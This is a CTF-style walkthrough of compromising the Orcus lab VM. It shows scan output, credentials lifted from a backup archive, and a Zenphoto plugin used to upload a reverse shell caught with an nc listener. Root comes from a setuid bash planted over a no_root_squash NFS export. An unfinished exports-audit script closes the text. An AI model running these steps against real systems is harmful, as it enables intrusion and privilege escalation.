Orcus VM


Information Gathering

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 02:30 EDT
Nmap scan report for 192.168.56.143
Host is up (0.00058s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
34305/tcp open unknown
38125/tcp open unknown
44363/tcp open unknown
45529/tcp open unknown
MAC Address: 08:00:27:EB:CE:6D (Oracle VirtualBox virtual NIC)

Quite a few ports are open. Leaving the five-digit ports aside for now: 22, 53, 80, 110, 111, 139, 143, 443, 445, 993, 995, 2049.

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,111,139,143,443,445,993,995,2049 192.168.56.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 02:32 EDT
Nmap scan report for 192.168.56.143
Host is up (0.00053s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
| 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
|_ 256 c9:a9:c9:0d:df:7c:fc:a7:da:87:ef:d3:38:c3:f2:a6 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_pop3-capabilities: UIDL STLS CAPA TOP SASL PIPELINING RESP-CODES AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 39021/udp6 mountd
| 100005 1,2,3 44363/tcp mountd
| 100005 1,2,3 48748/tcp6 mountd
| 100005 1,2,3 57241/udp mountd
| 100021 1,3,4 41210/tcp6 nlockmgr
| 100021 1,3,4 45529/tcp nlockmgr
| 100021 1,3,4 47338/udp nlockmgr
| 100021 1,3,4 48376/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_imap-capabilities: LOGINDISABLEDA0001 IDLE more LOGIN-REFERRALS post-login IMAP4rev1 STARTTLS Pre-login SASL-IR listed ENABLE LITERAL+ capabilities OK ID have
443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
| 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
|_ 256 c9:a9:c9:0d:df:7c:fc:a7:da:87:ef:d3:38:c3:f2:a6 (ED25519)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: more IDLE ID AUTH=PLAINA0001 IMAP4rev1 LOGIN-REFERRALS Pre-login SASL-IR post-login ENABLE LITERAL+ listed capabilities OK have
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER CAPA TOP SASL(PLAIN) PIPELINING RESP-CODES AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs 2-4 (RPC #100003)
MAC Address: 08:00:27:EB:CE:6D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2023-09-20T14:32:50
|_ start_date: N/A
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: \x00
| NetBIOS computer name: ORCUS\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-09-20T10:32:50-04:00
|_clock-skew: mean: 9h19m58s, deviation: 2h18m34s, median: 7h59m57s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

The OS is Ubuntu, port 443 is also SSH, and the web root contains a robots.txt.

Directory Brute-forcing

Check each path listed in robots.txt, and run a directory brute-force at the same time.

┌──(kali㉿kali)-[/tmp/tmp]
└─$ sudo gobuster dir -u http://192.168.56.143/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,html,sql,rar,zip,txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.143/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,php,html,sql,rar,zip
[+] Timeout: 10s
===============================================================
2023/09/20 05:38:01 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 101]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/files (Status: 301) [Size: 316] [--> http://192.168.56.143/files/]
/themes (Status: 301) [Size: 317] [--> http://192.168.56.143/themes/]
/login.php (Status: 302) [Size: 0] [--> http://192.168.56.143/index.php?controller=login&action=showlogin]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.143/admin/]
/index.php (Status: 200) [Size: 4567]
/test.php (Status: 200) [Size: 0]
/install (Status: 301) [Size: 318] [--> http://192.168.56.143/install/]
/thumb.php (Status: 302) [Size: 0] [--> /framework/core/assets/images/default_preview_notfound.gif]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.143/javascript/]
/external (Status: 301) [Size: 319] [--> http://192.168.56.143/external/]
/notes.php (Status: 200) [Size: 0]
/connect.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 1347]
/cron (Status: 301) [Size: 315] [--> http://192.168.56.143/cron/]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.143/tmp/]
/LICENSE (Status: 200) [Size: 15437]
/framework (Status: 301) [Size: 320] [--> http://192.168.56.143/framework/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.143/phpmyadmin/]
/reset.php (Status: 302) [Size: 0] [--> http://192.168.56.143/index.php?section=SITE_DEFAULT_SECTION]
/backups (Status: 301) [Size: 318] [--> http://192.168.56.143/backups/]
/webalizer (Status: 200) [Size: 0]
/xmlrpc.php (Status: 200) [Size: 0]
/selector.php (Status: 200) [Size: 0]
/FCKeditor (Status: 301) [Size: 320] [--> http://192.168.56.143/FCKeditor/]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
/overrides.php (Status: 200) [Size: 0]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 545]
/site_rss.php (Status: 302) [Size: 0] [--> http://192.168.56.143/index.php?controller=rss&action=feed]
Progress: 8914966 / 8916838 (99.98%)
===============================================================
2023/09/20 06:06:39 Finished
===============================================================

The source of the admin directory contains the comment "This is a backup taken from the backups/". Visiting backups reveals two files; ssh-creds.bak cannot be read because of its permissions.

Backup File Disclosure

Extract the archive and inspect it locally.

┌──(kali㉿kali)-[~/Downloads/Orcus/SimplePHPQuiz]
└─$ tree
.
├── add_quiz.php
├── css
│   ├── bootstrap.css
│   ├── bootstrap.css.map
│   ├── bootstrap.min.css
│   ├── bootstrap-theme.css
│   ├── bootstrap-theme.css.map
│   ├── bootstrap-theme.min.css
│   └── theme.css
├── fonts
│   ├── glyphicons-halflings-regular.eot
│   ├── glyphicons-halflings-regular.svg
│   ├── glyphicons-halflings-regular.ttf
│   └── glyphicons-halflings-regular.woff
├── includes
│   ├── db_conn.php
│   ├── footer.html
│   ├── functions_list.php
│   ├── header.html
│   ├── validation_functions.php
│   └── view_result.php
├── index.php
├── js
│   ├── bootstrap.js
│   └── bootstrap.min.js
├── process_quizAdd.php
├── quiz.php
├── README.md
├── samplequiz.php
└── view_result.php

5 directories, 26 files

db_conn.php in the includes folder contains the database username and password.

┌──(kali㉿kali)-[~/Downloads/Orcus/SimplePHPQuiz]
└─$ cat includes/db_conn.php
<?php

//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
echo "Could not connect to MySql. Please try again";
exit();
}
?>

The brute-force results include phpmyadmin; try logging in with the credentials above.

After going through it, only one email address and two password hashes turned up, and the online lookup sites returned nothing for them. I considered getting a shell from here, but the writable folders are restricted.

I was stuck here for a long time, and went back over each directory again.

The login page reports that the database is offline.

http://192.168.56.143/index.php?controller=login&action=showlogin
This site is currently down for maintenance.
Database is currently Off-line!

The various .md files belong to this CMS. Searching for vulnerabilities in it turns up a SQL injection, but with the database not connected that is of little use; a local file inclusion attempt also failed, probably a version mismatch.

/TODO.md
Exponent Content Management System

There are a few other directories holding files or subfolders, with nothing sensitive in them either.

Inspecting SMB and NFS

Try testing SMB and NFS.

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo smbmap -H 192.168.56.143
[sudo] password for kali:
[+] Guest session IP: 192.168.56.143:445 Name: 192.168.56.143
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Orcus server (Samba, Ubuntu))

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 02:44 EDT
Nmap scan report for 192.168.56.143
Host is up (0.00087s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
MAC Address: 08:00:27:EB:CE:6D (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.56.143\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Orcus server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.56.143\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
| smb-enum-users:
| ORCUS\root (RID: 1001)
| Full name: root
| Description:
| Flags: Normal user account
| ORCUS\viper (RID: 1000)
| Full name: viper
| Description:
|_ Flags: Normal user account

Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ showmount -e 192.168.56.143
Export list for 192.168.56.143:
/tmp *

This gives a possible username, viper. The NFS export is the tmp directory, which at this point does not seem very useful.

Tried brute-forcing SSH with the database password; it failed.

Out of ideas, so I looked at a write-up. The wordlist was the problem, which I had not considered; last time I also got stuck at the directory brute-force stage. Painful.

┌──(kali㉿kali)-[/tmp/tmp]
└─$ sudo gobuster dir -u http://192.168.56.143/ -w /usr/share/seclists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.143/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/09/20 06:18:48 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 298]
/.htpasswd (Status: 403) [Size: 298]
/FCKeditor (Status: 301) [Size: 320] [--> http://192.168.56.143/FCKeditor/]
/LICENSE (Status: 200) [Size: 15437]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.143/admin/]
/backups (Status: 301) [Size: 318] [--> http://192.168.56.143/backups/]
/cron (Status: 301) [Size: 315] [--> http://192.168.56.143/cron/]
/external (Status: 301) [Size: 319] [--> http://192.168.56.143/external/]
/files (Status: 301) [Size: 316] [--> http://192.168.56.143/files/]
/framework (Status: 301) [Size: 320] [--> http://192.168.56.143/framework/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.143/install/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.143/javascript/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.143/phpmyadmin/]
/robots.txt (Status: 200) [Size: 1347]
/server-status (Status: 403) [Size: 302]
/sitemap.xml (Status: 200) [Size: 113]
/themes (Status: 301) [Size: 317] [--> http://192.168.56.143/themes/]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.143/tmp/]
/webalizer (Status: 200) [Size: 0]
/zenphoto (Status: 301) [Size: 319] [--> http://192.168.56.143/zenphoto/]

===============================================================
2023/09/20 06:18:51 Finished
===============================================================

Zenphoto Installation

Opening /zenphoto shows the installer, which complains that the MySQL connection has a problem. Conveniently, we have a username and password.

Fill them in and click save.

Click apply.

Click go.

Installation succeeds; next it asks for an admin username and password.

Set the credentials to admin:admin123 and click apply.

It then redirects to the login page; log in with the password we just set.

Getting a Shell from the Admin Panel

I originally wanted to search online for how to get a shell from the Zenphoto admin panel, but there is very little material, so I explored on my own. Going through the features, it looks like a CMS for managing photos.

On the upload page, even zip files must contain image formats once extracted. A quick test suggests a whitelist; a php file cannot be uploaded directly.

The plugins page has one that might help: its description says it provides simple management of uploaded files.

After activating it, the upload page gains an extra option.

Create a new file and put the reverse shell code in it.

Start a listener first, then request http://192.168.56.143/zenphoto/zp-data/test.php to trigger the reverse shell.

Privilege Escalation

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.143] 45566
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
06:48:46 up 6 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1560): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Orcus:/$ sudo -l
sudo -l
sudo: unable to resolve host Orcus: Connection timed out
sudo: no tty present and no askpass program specified
www-data@Orcus:/$ which python
which python
/usr/bin/python
www-data@Orcus:/$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@Orcus:/$ sudo -l
sudo -l
sudo: unable to resolve host Orcus: Connection timed out
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts
www-data@Orcus:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:eb:ce:6d brd ff:ff:ff:ff:ff:ff
inet 192.168.56.143/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever

Information Gathering

Look at the web directory.

www-data@Orcus:/var/www$ ls
ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$ cd html
cd html
www-data@Orcus:/var/www/html$ ls -alih
ls -alih
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www/html$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www/html$ cd zenphoto
cd zenphoto
www-data@Orcus:/var/www/html/zenphoto$ ls
ls
LICENSE albums cache_html favicon.ico plugins themes zp-core
README.md cache contributing.md index.php robots.txt uploaded zp-data

There is a flag.txt, but the html directory has no execute permission for us, so we cannot list it. Next, check the cron jobs and user home directories.

www-data@Orcus:/var$ ls -alih /etc/passwd /etc/shadow /etc/crontab
ls -alih /etc/passwd /etc/shadow /etc/crontab
262378 -rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
265272 -rw-r--r-- 1 root root 2.2K Oct 28 2016 /etc/passwd
263179 -rw-r----- 1 root shadow 1.2K Oct 28 2016 /etc/shadow
www-data@Orcus:/var$ cat /etc/passwd | grep "/bin/bash"
cat /etc/passwd | grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
postgres:x:110:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
kippo:x:1001:27::/home/kippo:/bin/bash

www-data@Orcus:/var/backups$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
www-data@Orcus:/var/www/html/zenphoto$ cd /home
cd /home
www-data@Orcus:/home$ ls
ls
www-data@Orcus:/home$ ls -alih
ls -alih
total 12K
12 drwxr-xr-x 3 root root 4.0K Nov 1 2016 .
2 drwxr-xr-x 24 root root 4.0K Oct 30 2016 ..
8939 drwxr-xr-x 2 root root 4.0K Nov 1 2016 .youwillfindnothinghere
www-data@Orcus:/home$ cd .youwillfindnothinghere
cd .youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls -liah
ls -liah
total 8.0K
8939 drwxr-xr-x 2 root root 4.0K Nov 1 2016 .
12 drwxr-xr-x 3 root root 4.0K Nov 1 2016 ..
8940 -rw-r--r-- 1 root root 0 Nov 1 2016 itoldyou

The home directory is empty. What about SUID binaries?

www-data@Orcus:/var/www$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
46465 388 -rwsr-xr-- 1 root dip 396068 Jan 29 2016 /usr/sbin/pppd
26094 40 -rwsr-xr-x 1 root root 39560 Mar 29 2016 /usr/bin/chsh
20009 20 -rwsr-xr-x 1 root root 18216 Jan 17 2016 /usr/bin/pkexec
18795 36 -rwsr-xr-x 1 root root 36288 Mar 29 2016 /usr/bin/newuidmap
18793 36 -rwsr-xr-x 1 root root 36288 Mar 29 2016 /usr/bin/newgidmap
26095 48 -rwsr-xr-x 1 root root 48264 Mar 29 2016 /usr/bin/chfn
26091 52 -rwsr-xr-x 1 root root 53128 Mar 29 2016 /usr/bin/passwd
19523 52 -rwsr-sr-x 1 daemon daemon 50748 Jan 14 2016 /usr/bin/at
26097 80 -rwsr-xr-x 1 root root 78012 Mar 29 2016 /usr/bin/gpasswd
1518 36 -rwsr-xr-x 1 root root 34680 Mar 29 2016 /usr/bin/newgrp
4130 160 -rwsr-xr-x 1 root root 159852 Aug 17 2016 /usr/bin/sudo
18105 96 -rwsr-sr-x 1 root mail 96192 May 15 2015 /usr/bin/procmail
279472 12 -rwsr-xr-x 1 root root 9760 Jul 26 2015 /usr/lib/authbind/helper
536 8 -rwsr-xr-x 1 root root 5480 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
19356 504 -rwsr-xr-x 1 root root 513528 Aug 11 2016 /usr/lib/openssh/ssh-keysign
131672 48 -rwsr-xr-- 1 root messagebus 46436 Apr 1 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135108 16 -rwsr-xr-x 1 root root 13960 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
18834 52 -rwsr-xr-x 1 root root 50540 Oct 6 2016 /usr/lib/snapd/snap-confine
18771 40 -rwsr-xr-x 1 root root 38300 Oct 21 2016 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
26896 96 -rwsr-xr-x 1 root root 96644 Apr 6 2016 /sbin/mount.nfs
19990 40 -rwsr-xr-x 1 root root 38660 Aug 21 2015 /sbin/mount.cifs
132439 40 -rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
131099 40 -rwsr-xr-x 1 root root 38900 Mar 29 2016 /bin/su
134208 156 -rwsr-xr-x 1 root root 157424 Feb 17 2016 /bin/ntfs-3g
131157 32 -rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
133438 28 -rwsr-xr-x 1 root root 26492 May 26 2016 /bin/umount
133434 36 -rwsr-xr-x 1 root root 34812 May 26 2016 /bin/mount
131637 44 -rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6

I looked up a few unfamiliar ones (just asked ChatGPT). There is a privilege escalation exploit for the SUID /usr/lib/snapd/snap-confine, but it failed because of permission problems on certain folders.

Kernel Privilege Escalation

Try kernel exploits.

I also consulted the linpeas output; every exploit related to 4.4.0 in the screenshot failed, and so did the ones linpeas marked as highly likely. Stuck again. Time to read the linpeas output from the top.

linpeas found another database username and password in one of the PHP configuration files.

$dbpass='sX6yATfXjVyf';
$dbuser='phpmyadmin';

It also found an unusual file.

/etc/kippo/honeyfs/etc/passwd

Go into /etc/kippo.

It turns out to be a honeypot.

www-data@Orcus:/etc/kippo$ ls
ls
README.md dl fs.pickle kippo kippo.tac start.sh txtcmds
data doc honeyfs kippo.cfg log stop.sh utils
www-data@Orcus:/etc/kippo$ cd data
cd data
www-data@Orcus:/etc/kippo/data$ ls
ls
userdb.txt
www-data@Orcus:/etc/kippo/data$ cat userdb.txt
cat userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

This reveals the honeypot's usernames and passwords, and one of them is even a flag. I tried switching to root with this password and with the database passwords collected earlier, but it failed.

NFS Privilege Escalation

While checking the linpeas output I overlooked one high-risk finding; the write-up reminded me of it.

Ask ChatGPT.

The privilege escalation lecture from 红队笔记 also covers this method, NFS privilege escalation: [[../technique/Privilege Escalation/「红队笔记」Linux提权精讲|「红队笔记」Linux提权精讲]]

In the shell, copy the bash binary into the tmp folder, then from the local shell where the export is mounted change the file's owner and permissions.

www-data@Orcus:/tmp$ cp /bin/bash ./
cp /bin/bash ./
www-data@Orcus:/tmp$ ls -alih ./bash
ls -alih ./bash
8247 -rwxr-xr-x 1 www-data www-data 1.1M Sep 21 13:17 ./bash
┌──(root㉿kali)-[/tmp/tmp]
└─# chown root:root bash

┌──(root㉿kali)-[/tmp/tmp]
└─# chmod +s bash
www-data@Orcus:/tmp$ ls -alih ./bash
ls -alih ./bash
8247 -rwsr-sr-x 1 root root 1.1M Sep 21 13:17 ./bash
www-data@Orcus:/tmp$ ./bash -p
./bash -p
bash-4.3# whoami
whoami
root
bash-4.3# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.3# cd /root
cd /root
bash-4.3# ls
ls
flag.txt
bash-4.3# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:eb:ce:6d brd ff:ff:ff:ff:ff:ff
inet 192.168.56.143/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
bash-4.3# uname -a
uname -a
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
bash-4.3# cd /root
cd /root
bash-4.3# ls -liah
ls -liah
total 44K
16 drwx------ 6 root root 4.0K Mar 11 2017 .
2 drwxr-xr-x 24 root root 4.0K Oct 30 2016 ..
20 -rw------- 1 root root 118 Mar 11 2017 .bash_history
17 -rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
131267 drwx------ 3 root root 4.0K Nov 1 2016 .cache
262316 drwx------ 3 root root 4.0K Oct 11 2016 .config
134577 drwxr-xr-x 2 root root 4.0K Oct 28 2016 .nano
18 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
131271 drwx------ 2 root root 4.0K Oct 22 2016 .ssh
8248 -rw------- 1 root root 657 Nov 1 2016 .viminfo
863 ---------- 1 root root 33 Oct 22 2016 flag.txt
bash-4.3# cat flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe
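The escalation above works only because the export is reachable from any client and root is not squashed, so a root user on the client can leave a root-owned setuid file on the share. As an added defensive check (not code from the original write-up), the following script parses text in exports(5) syntax and flags exactly those conditions; the export table it reads is constructed to resemble the box's `showmount -e` result (`/tmp *`), and the hardened `/srv/share` line is likewise made up for contrast.

```python
"""Audit NFS exports for the misconfiguration this box relies on.

Added example, not code from the original write-up. It parses text in
exports(5) syntax and flags exports that are reachable from any client
('*') or that disable root_squash, which together let a remote root
plant a root-owned setuid binary on the export, as the write-up shows.
The export table below is constructed to resemble the box's
'showmount -e' output ('/tmp *'); no real host is queried.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input (not copied from the target machine).
SAMPLE_EXPORTS = """\
# /etc/exports: access control list for exported filesystems
/tmp *(rw,sync,no_root_squash,no_subtree_check)
/srv/share 192.168.56.0/24(ro,sync,root_squash) \\
           10.0.0.5(rw,sync)
/export/pub *
"""


@dataclass
class Finding:
    path: str
    client: str
    options: list
    reasons: list = field(default_factory=list)


def parse_exports(text):
    """Yield (path, client, options) for every client spec in exports(5) text.

    Handles '#' comments, backslash line continuations and several client
    specs per line. A spec without parentheses carries no explicit options.
    """
    text = text.replace("\\\n", " ")  # join continuation lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"  # exportfs treats a bare '(opts)' as '*'
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            yield path, client, opts


def audit_exports(text):
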